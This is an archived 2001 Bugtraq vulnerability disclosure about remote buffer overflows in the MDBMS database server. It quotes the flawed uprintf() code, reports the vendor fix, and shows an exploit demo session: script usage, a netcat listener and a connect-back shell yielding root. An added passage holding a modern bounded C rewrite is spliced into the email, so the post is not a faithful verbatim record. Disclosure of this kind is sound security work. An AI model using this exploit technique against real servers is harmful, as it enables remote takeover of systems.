6618752 2001-06-12 21:47 +0200  /90 lines/ teleh0r - <teleh0r@digit-labs.org>
Sent by: joel@lysator.liu.se
Imported: 2001-06-14  00:08  by Brevbäraren
External recipient: BUGTRAQ@securityfocus.com
Recipient: Bugtraq (import) <17414>
Subject: Remote buffer overflow in MDBMS.
------------------------------------------------------------

Dear bugtraq readers,
 
MDBMS is a SQL database server (currently) for UNIX systems.
Version 0.99b9 and below contain an exploitable buffer
overflow in the handling of the \s console command.
 
When a user passes large buffers to the server in the form
of multiple lines, these are appended to the end of each
other into one buffer. A subsequent call to the \s command
hands that buffer to the uprintf() shown below and causes
the overflow.
 
Below is the faulty code (from interface.cc):
 
void user::uprintf(char *s, ...)
{
  char b[10000];
  int len=strlen(outbuf), newlen;
  va_list ap;
  va_start(ap,s);
  vsprintf(b,s,ap); /* <---- unbounded write into the 10000-byte stack buffer b */
  va_end(ap);
  newlen=strlen(b);
  while (newlen+len+10>=outsize) outbuf=(char*)realloc(outbuf,outsize+=1000);
  strcat(outbuf,b);
  FD_SET(fd,&parent->wmask);
}
 
mu-b also found a buffer overflow in the "create database"
code. This one was caused by a sprintf() that generated
the name of the management variable. It has been fixed:
table and database names can no longer be larger than
128 bytes.
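As an added example (not MDBMS's code, and not the fix Marty shipped), here is a bounded rewrite of the uprintf() pattern quoted above, in the same spirit as the 128-byte name limit applied to the "create database" sprintf(): vsnprintf() replaces vsprintf(), so an oversized message is truncated and reported instead of overrunning the stack. The outbuf_t type and the function names are assumptions made for this example.

```c
#include <stdarg.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Hypothetical stand-in for the two fields of the MDBMS user object
 * that uprintf() touches: the growing outbuf and its allocation size. */
typedef struct { char *outbuf; size_t outsize; } outbuf_t;

/* Bounded rewrite of uprintf(): same 10000-byte scratch buffer, but
 * vsnprintf() can never write past it. Returns 0 on success, 1 if the
 * message was truncated to fit, -1 on allocation failure. */
int bounded_uprintf(outbuf_t *o, const char *s, ...)
{
    char b[10000];
    va_list ap;
    va_start(ap, s);
    int n = vsnprintf(b, sizeof b, s, ap);     /* bounded, unlike vsprintf */
    va_end(ap);
    if (n < 0) return -1;
    int truncated = (size_t)n >= sizeof b;
    size_t newlen = strlen(b);
    size_t len = o->outbuf ? strlen(o->outbuf) : 0;
    while (newlen + len + 10 >= o->outsize) {   /* grow outbuf as MDBMS does */
        char *p = realloc(o->outbuf, o->outsize + 1000);
        if (!p) return -1;
        if (!o->outbuf) p[0] = '\0';            /* first allocation starts empty */
        o->outbuf = p;
        o->outsize += 1000;
    }
    strcat(o->outbuf, b);   /* fits: outbuf now holds at least len+newlen+10 */
    return truncated;
}

/* Formats one message of msglen 'A's (constructed input) and reports
 * whether the result was truncated (1), intact (0) or wrong (-1). */
int demo_line(size_t msglen)
{
    outbuf_t o = { NULL, 0 };
    char *big = malloc(msglen + 1);
    memset(big, 'A', msglen);
    big[msglen] = '\0';
    int rc = bounded_uprintf(&o, "%s", big);
    size_t want = msglen < 10000 ? msglen : 9999;  /* 9999 chars + NUL fit in b */
    int ok = o.outbuf && strlen(o.outbuf) == want;
    free(big);
    free(o.outbuf);
    return ok ? rc : -1;
}
```

A 20000-byte line, the shape of input that overflowed the original, now comes back as 9999 bytes with the truncation flag set, while ordinary messages pass through unchanged.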
 
Information about the overflows was sent to marty@hinttech.com.
He has now fixed the problems, and new versions of MDBMS can
be found at: http://www.hinttech.com/mdbms/
 
We would like to thank Marty for his kind response and quick update.
 
Exploit example:
----------------
 
[teleh0r@localhost mdbms]$ ./mdbms-pms.pl
 
-- Remote code execution exploit - MDBMS <= 0.99b
-- <teleh0r@digit-labs.org> - Copyright (c) 2001
 
Usage: ./mdbms-pms.pl -t <hostname> -b <back>
 
     -t <hostname>    : hostname to test
     -b <back>        : connect back to ip
     -p <port>        : port (default: 2223)
     -d <delay>       : delay before timeout
     -o <offset>      : offset
     -h               : return to heap
 
[teleh0r@localhost mdbms]$ nc -l -v -p 1337 &
[1] 2070
listening on [any] 1337 ...
 
[teleh0r@localhost mdbms]$ ./mdbms-pms.pl -t 127.1 -b localhost -h
 
-- Remote code execution exploit - MDBMS <= 0.99b
-- <teleh0r@digit-labs.org> - Copyright (c) 2001
 
-> Connected to: 127.1 / MDBMS V0.99b9 ready.
-> Address : 0x302027d / xor-mask: 0x2020202
-> Return  : 0x80cfe76 / using the heap ...
-> Sending payload: ...
 
-> * Successfully sent payload - good luck!
 
connect to [127.0.0.1] from localhost.localdomain [127.0.0.1] 1189
[teleh0r@localhost mdbms]$ %
nc -l -v -p 1337
whoami; uname -mnrsp
root
Linux localhost.localdomain 2.4.2-2 i686 unknown
...
 
Exploit code attached.
 
Sincerely yours,
teleh0r and mu-b

--
To avoid criticism, do nothing, say nothing, be nothing.
                 -- Elbert Hubbard
(6618752) /teleh0r - <teleh0r@digit-labs.org>/------
Attachment (application/x-gzip) in text 6618753
6618753 2001-06-12 21:47 +0200  /41 lines/ teleh0r - <teleh0r@digit-labs.org>
Attachment filename: "mdbms.tar.gz"
Imported: 2001-06-14  00:08  by Brevbäraren
External recipient: BUGTRAQ@securityfocus.com
Recipient: Bugtraq (import) <17415>
Attachment (text/plain) to text 6618752
Subject: Attachment (mdbms.tar.gz) to: Remote buffer overflow in MDBMS.
------------------------------------------------------------
(6618753) /teleh0r - <teleh0r@digit-labs.org>/(re-wrapped)